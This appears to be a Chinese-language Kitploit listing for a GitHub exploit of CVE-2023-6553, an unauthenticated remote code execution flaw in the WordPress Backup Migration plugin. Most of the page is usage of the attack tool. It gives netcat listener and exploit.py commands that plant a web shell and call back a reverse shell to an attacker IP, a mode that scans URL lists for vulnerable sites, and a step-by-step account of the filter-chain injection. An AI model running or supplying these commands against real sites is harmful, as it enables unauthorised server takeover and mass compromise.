Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
WordPress_Backup_Migration-RCE_Unauthenticated — 此漏洞利用基于 CVE-2023-6553,是在 Chocapik 原始漏洞利用的基础上构建的,并新增了可直接获取反向 Shell 的功能。 | Kitploit
工具/GitHubGitHub/joaoaugustom/wordpress_backup_migration-rce_unauthenticated
漏洞利用框架漏洞分析Web应用程序漏洞利用渗透测试命令与控制Payload 开发
GitHubjoaoaugustom/wordpress_backup_migration-rce_unauthenticated

WordPress_Backup_Migration-RCE_Unauthenticated

此漏洞利用基于 CVE-2023-6553,是在 Chocapik 原始漏洞利用的基础上构建的,并新增了可直接获取反向 Shell 的功能。

查看仓库
151个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-6553 — Backup Migration 插件(WordPress)- 反向 Shell

Chocapikk 的 CVE-2023-6553 漏洞利用程序 的增强版本,在原有交互式 Web Shell 基础上新增了一条命令即可建立反向 Shell 的模式。


漏洞信息

CVE-2023-6553 — Backup Migration WordPress 插件(版本 ≤ 1.3.7)中的未认证远程代码执行漏洞。

该插件暴露了 backup-heart.php,它会从 Content-Dir HTTP 头中读取 PHP 过滤器链,并在未经身份验证或过滤的情况下将其传递给 include()。这使得未认证的攻击者可以通过注入精心构造的 php://filter 链来执行任意 PHP 代码。

  • CVSS: 9.8(严重)
  • 受影响插件: Backup Migration ≤ 1.3.7
  • 参考: WPScan

致谢

原始漏洞利用程序由 Chocapikk 编写 — 所有核心利用逻辑(过滤器链生成、文件写入、交互式 Shell)均出自其手。本仓库仅在此基础上增加了反向 Shell 触发模式。


与原版的区别

功能原版(Chocapikk)本版本
交互式 Web Shell✅✅(未改动)
反向 Shell❌✅(-r)
多 URL 扫描✅✅(未改动)
新增参数—-r、-l、-p、--shell

唯一的增量为:

  1. trigger_reverse_shell() 方法 — 在 Web Shell 部署完成后(与原版流程相同),发送单个 GET 请求,将反向 Shell 命令作为 0 参数传入,与交互式 Shell 完全一致。
  2. 4 个新的 argparse 参数 — 用于启用和配置反向 Shell 模式。
  3. main() 中的 5 行代码 — 当存在 -r 参数时,将 interactive_shell() 替换为 trigger_reverse_shell()。

其余所有内容 — 漏洞检查、文件写入循环、复制/删除、交互模式、多 URL 扫描 — 均与原版保持一致,未做任何改动。


环境要求

root@kitploit:~
pip install requests rich alive-progress prompt-toolkit php-filter-chain

使用方法

反向 Shell 模式(新增)

root@kitploit:~
# 先启动你的监听器
rlwrap nc -lvnp 4444

# 运行漏洞利用程序
python3 exploit.py -u http://TARGET/blog -r -l YOUR_IP -p 4444

如果目标上无法使用 bash /dev/tcp,请改用 mkfifo(依赖 nc):

root@kitploit:~
python3 exploit.py -u http://TARGET/blog -r -l YOUR_IP -p 4444 --shell mkfifo

交互式 Web Shell 模式(原版行为)

root@kitploit:~
python3 exploit.py -u http://TARGET/blog

仅进行漏洞检查

root@kitploit:~
python3 exploit.py -u http://TARGET/blog -c

扫描 URL 列表

root@kitploit:~
python3 exploit.py -f urls.txt -t 10 -o vulnerable.txt

全部参数

root@kitploit:~
-u / --url      目标基础 URL(例如 http://target/blog)
-r / --revshell 启用反向 Shell 模式
-l / --lhost    用于接收 Shell 的你的 IP(与 -r 配合使用)
-p / --lport    你的监听端口(默认:4444)
     --shell    Shell 类型:bash(默认)或 mkfifo
-c / --check    仅检查漏洞,不部署 Shell
-f / --file     包含待扫描 URL 列表的文件
-t / --threads  多 URL 扫描的线程数(默认:5)
-o / --output   扫描结果输出文件

工作原理

root@kitploit:~
1. POST /wp-content/plugins/backup-backup/includes/backup-heart.php
   Content-Dir: php://filter/...<编码后的 PHP>
   → 将 Web Shell 逐字符写入临时文件
   → 将临时文件复制为 <random>.php

2. GET /wp-content/plugins/backup-backup/includes/<random>.php?0=<cmd>
   → 通过反引号运算符执行命令
   → 交互模式:循环从 stdin 读取命令
   → 反向 Shell 模式:发送 bash/mkfifo 单行命令,连接监听器

3. 清理:unlink(<random>.php)

免责声明

本工具仅用于授权的渗透测试和安全研究。请勿将其用于未经明确许可的系统。

下载工具